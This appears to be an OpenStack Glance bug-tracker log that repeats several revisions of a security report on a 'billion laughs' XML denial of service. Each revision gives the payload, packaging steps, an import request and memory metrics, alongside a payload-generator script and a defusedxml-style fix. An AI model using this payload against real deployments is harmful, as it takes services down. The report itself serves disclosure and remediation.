<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4].
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalents from a secure XML parsing library such as defusedxml [5].
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
|
2016-09-20 00:31:32 |
Charles Neill |
description |
Creating a task to import an OVA file containing a malicious OVF file will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" attack when parsing untrusted input [3].
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4].
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalents from a secure XML parsing library such as defusedxml [5].
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
Creating a task to import an OVA file containing a malicious OVF file will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" attack when parsing untrusted input [3].
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4].
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalents from a secure XML parsing library such as defusedxml [5].
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
|
2016-09-20 01:03:41 |
Tristan Cacqueray |
bug task added |
|
ossa |
|
2016-09-20 01:04:10 |
Tristan Cacqueray |
description |
Creating a task to import an OVA file containing a malicious OVF file will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" attack when parsing untrusted input [3].
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4].
-----------------------------------------
Mitigation
-----------------------------------------
Any instances of xml.etree should be replaced with their equivalents from a secure XML parsing library such as defusedxml [5].
1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml
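For illustration, the kind of protection defusedxml provides can be sketched with the standard library alone: hook expat's entity-declaration callback and reject any document that declares entities, before a single expansion happens. This is only a sketch of the idea, not the actual ovf_process.py patch; the names reject_entities and safe_fromstring are hypothetical.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class EntitiesForbidden(ValueError):
    """Raised when untrusted XML declares entities."""


def reject_entities(data):
    # expat calls EntityDeclHandler for every <!ENTITY ...> declaration;
    # raising here aborts parsing before any expansion can occur.
    parser = xml.parsers.expat.ParserCreate()

    def forbid(entity_name, *args):
        raise EntitiesForbidden("entity declaration: %r" % entity_name)

    parser.EntityDeclHandler = forbid
    parser.Parse(data, True)


def safe_fromstring(data):
    # Pre-scan for entity declarations, then parse normally.
    reject_entities(data)
    return ET.fromstring(data)


bomb = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
]>
<lolz>&lol;</lolz>"""

try:
    safe_fromstring(bomb)
except EntitiesForbidden as exc:
    print("rejected:", exc)
```

With defusedxml itself, the equivalent is simply parsing via defusedxml.ElementTree, which raises defusedxml.EntitiesForbidden for the same input.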
-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). |
This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments.
Creating a task to import an OVA file containing a malicious OVF file will result in significant memory usage by the glance-api process.
This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.
As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" attack when parsing untrusted input [3].
Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.
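A back-of-envelope calculation shows why a payload of a few hundred bytes exhausts memory: each of the ten nested entity levels in the OVF below multiplies the text tenfold.

```python
# Expansion factor of the "billion laughs" payload: ten nested entity
# levels, each expanding to 10 copies of the previous one.
levels = 10
copies = 10 ** levels        # occurrences of "lol" after full expansion
expanded_bytes = 3 * copies  # "lol" is 3 bytes
print(copies)                # 10000000000
print(expanded_bytes)        # 30000000000 -> roughly 30 GB of text
```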
-----------------------------------------
Example request
-----------------------------------------
POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287
{
"type": "import",
"input": {
"import_from": "http://127.0.0.1:9090/laugh.ova",
"import_from_format": "raw",
"image_properties": {
"disk_format": "raw",
"container_format": "ova",
"name": "laugh"
}
}
}
-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------
"laugh.ova" can be created like so:
1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>
2. Create the OVA file (tarball) with the "tar" utility:
$ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova
3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:
$ python -m SimpleHTTPServer 9090
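Steps 1-3 above can also be scripted with the standard library; a sketch (the billion_laughs_ovf helper is hypothetical, while the file names and port match the report):

```python
import tarfile


def billion_laughs_ovf(levels=10):
    # Reproduce the step-1 payload: each entity level expands to ten
    # copies of the previous one.
    lines = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE lolz [",
        '<!ENTITY lol "lol">',
        "<!ELEMENT lolz (#PCDATA)>",
    ]
    for i in range(1, levels + 1):
        prev = "lol" if i == 1 else "lol%d" % (i - 1)
        lines.append('<!ENTITY lol%d "%s">' % (i, ("&%s;" % prev) * 10))
    lines.append("]>")
    lines.append("<lolz>&lol%d;</lolz>" % levels)
    return "\n".join(lines)


# Step 1: write the malicious OVF.
with open("laugh.ovf", "w") as f:
    f.write(billion_laughs_ovf())

# Step 2: an OVA is simply a tar archive wrapping the OVF.
with tarfile.open("laugh.ova", "w") as tar:
    tar.add("laugh.ovf")

# Step 3 (optional): serve it with "python -m SimpleHTTPServer 9090"
# (Python 2) or "python3 -m http.server 9090".
```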
-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:
$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
After submitting this task twice (repeating calls to the above command):
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB
Object Metric Values
---------- -------------------- --------------------------------------------
